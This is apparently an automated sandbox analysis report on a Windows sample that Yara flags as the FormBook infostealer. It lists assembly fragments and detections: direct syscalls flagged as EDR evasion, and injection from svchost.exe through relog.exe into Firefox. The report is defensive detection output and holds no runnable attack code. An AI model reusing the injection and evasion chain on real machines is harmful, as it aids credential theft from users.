Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306CA24 mov eax, dword ptr fs:[00000030h]	5_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305EA2E mov eax, dword ptr fs:[00000030h]	5_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03054A35 mov eax, dword ptr fs:[00000030h]	5_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03054A35 mov eax, dword ptr fs:[00000030h]	5_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306CA38 mov eax, dword ptr fs:[00000030h]	5_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036A50 mov eax, dword ptr fs:[00000030h]	5_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036A50 mov eax, dword ptr fs:[00000030h]	5_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036A50 mov eax, dword ptr fs:[00000030h]	5_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036A50 mov eax, dword ptr fs:[00000030h]	5_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036A50 mov eax, dword ptr fs:[00000030h]	5_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036A50 mov eax, dword ptr fs:[00000030h]	5_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03036A50 mov eax, dword ptr fs:[00000030h]	5_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040A5B mov eax, dword ptr fs:[00000030h]	5_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040A5B mov eax, dword ptr fs:[00000030h]	5_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306CA6F mov eax, dword ptr fs:[00000030h]	5_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306CA6F mov eax, dword ptr fs:[00000030h]	5_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306CA6F mov eax, dword ptr fs:[00000030h]	5_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DEA60 mov eax, dword ptr fs:[00000030h]	5_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030ACA72 mov eax, dword ptr fs:[00000030h]	5_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030ACA72 mov eax, dword ptr fs:[00000030h]	5_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303EA80 mov eax, dword ptr fs:[00000030h]	5_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104A80 mov eax, dword ptr fs:[00000030h]	5_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03068A90 mov edx, dword ptr fs:[00000030h]	5_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038AA0 mov eax, dword ptr fs:[00000030h]	5_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038AA0 mov eax, dword ptr fs:[00000030h]	5_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03086AA4 mov eax, dword ptr fs:[00000030h]	5_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03086ACC mov eax, dword ptr fs:[00000030h]	5_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03086ACC mov eax, dword ptr fs:[00000030h]	5_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03086ACC mov eax, dword ptr fs:[00000030h]	5_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030AD0 mov eax, dword ptr fs:[00000030h]	5_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03064AD0 mov eax, dword ptr fs:[00000030h]	5_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03064AD0 mov eax, dword ptr fs:[00000030h]	5_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306AAEE mov eax, dword ptr fs:[00000030h]	5_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306AAEE mov eax, dword ptr fs:[00000030h]	5_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE908 mov eax, dword ptr fs:[00000030h]	5_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE908 mov eax, dword ptr fs:[00000030h]	5_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BC912 mov eax, dword ptr fs:[00000030h]	5_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03028918 mov eax, dword ptr fs:[00000030h]	5_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03028918 mov eax, dword ptr fs:[00000030h]	5_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B892A mov eax, dword ptr fs:[00000030h]	5_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C892B mov eax, dword ptr fs:[00000030h]	5_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B0946 mov eax, dword ptr fs:[00000030h]	5_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104940 mov eax, dword ptr fs:[00000030h]	5_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03056962 mov eax, dword ptr fs:[00000030h]	5_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03056962 mov eax, dword ptr fs:[00000030h]	5_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03056962 mov eax, dword ptr fs:[00000030h]	5_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0307096E mov eax, dword ptr fs:[00000030h]	5_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0307096E mov edx, dword ptr fs:[00000030h]	5_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0307096E mov eax, dword ptr fs:[00000030h]	5_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D4978 mov eax, dword ptr fs:[00000030h]	5_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D4978 mov eax, dword ptr fs:[00000030h]	5_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BC97C mov eax, dword ptr fs:[00000030h]	5_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030429A0 mov eax, dword ptr fs:[00000030h]	5_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030309AD mov eax, dword ptr fs:[00000030h]	5_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030309AD mov eax, dword ptr fs:[00000030h]	5_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B89B3 mov esi, dword ptr fs:[00000030h]	5_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B89B3 mov eax, dword ptr fs:[00000030h]	5_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B89B3 mov eax, dword ptr fs:[00000030h]	5_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C69C0 mov eax, dword ptr fs:[00000030h]	5_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	5_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030649D0 mov eax, dword ptr fs:[00000030h]	5_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	5_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	5_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030629F9 mov eax, dword ptr fs:[00000030h]	5_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030629F9 mov eax, dword ptr fs:[00000030h]	5_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BC810 mov eax, dword ptr fs:[00000030h]	5_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03052835 mov eax, dword ptr fs:[00000030h]	5_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03052835 mov eax, dword ptr fs:[00000030h]	5_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03052835 mov eax, dword ptr fs:[00000030h]	5_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03052835 mov ecx, dword ptr fs:[00000030h]	5_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03052835 mov eax, dword ptr fs:[00000030h]	5_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03052835 mov eax, dword ptr fs:[00000030h]	5_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A830 mov eax, dword ptr fs:[00000030h]	5_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D483A mov eax, dword ptr fs:[00000030h]	5_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D483A mov eax, dword ptr fs:[00000030h]	5_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03042840 mov ecx, dword ptr fs:[00000030h]	5_2_03042840

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00F580A9

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00F2A155
Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Code function: 0_2_00F2A124 SetUnhandledExceptionFilter,		0_2_00F2A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread register set: target process: 1168

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread APC queued: target process: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E4008

Jump to behavior

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F587B1 LogonUserW,

0_2_00F587B1

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F03B3A

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00F048D7

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F64C7F mouse_event,

0_2_00F64C7F

Source: C:\Users\user\Desktop\k9OEsV37GE.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\k9OEsV37GE.exe"	Jump to behavior
Source: C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00F57CAF

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00F5874B

Source: k9OEsV37GE.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: k9OEsV37GE.exe, ClIUTLKtdeP.exe, 00000007.00000000.1586423486.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752398258.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000000.1750066846.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ClIUTLKtdeP.exe, 00000007.00000000.1586423486.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752398258.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000000.1750066846.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ClIUTLKtdeP.exe, 00000007.00000000.1586423486.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752398258.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000000.1750066846.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: ClIUTLKtdeP.exe, 00000007.00000000.1586423486.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000007.00000002.3752398258.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, ClIUTLKtdeP.exe, 00000009.00000000.1750066846.0000000000E30000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F2862B cpuid

0_2_00F2862B

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F34E87

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F41E06 GetUserNameW,

0_2_00F41E06

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00F33F3A

Source: C:\Users\user\Desktop\k9OEsV37GE.exe

Code function: 0_2_00F049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F049A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3745363879.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3750754693.00000000025E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3756481473.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
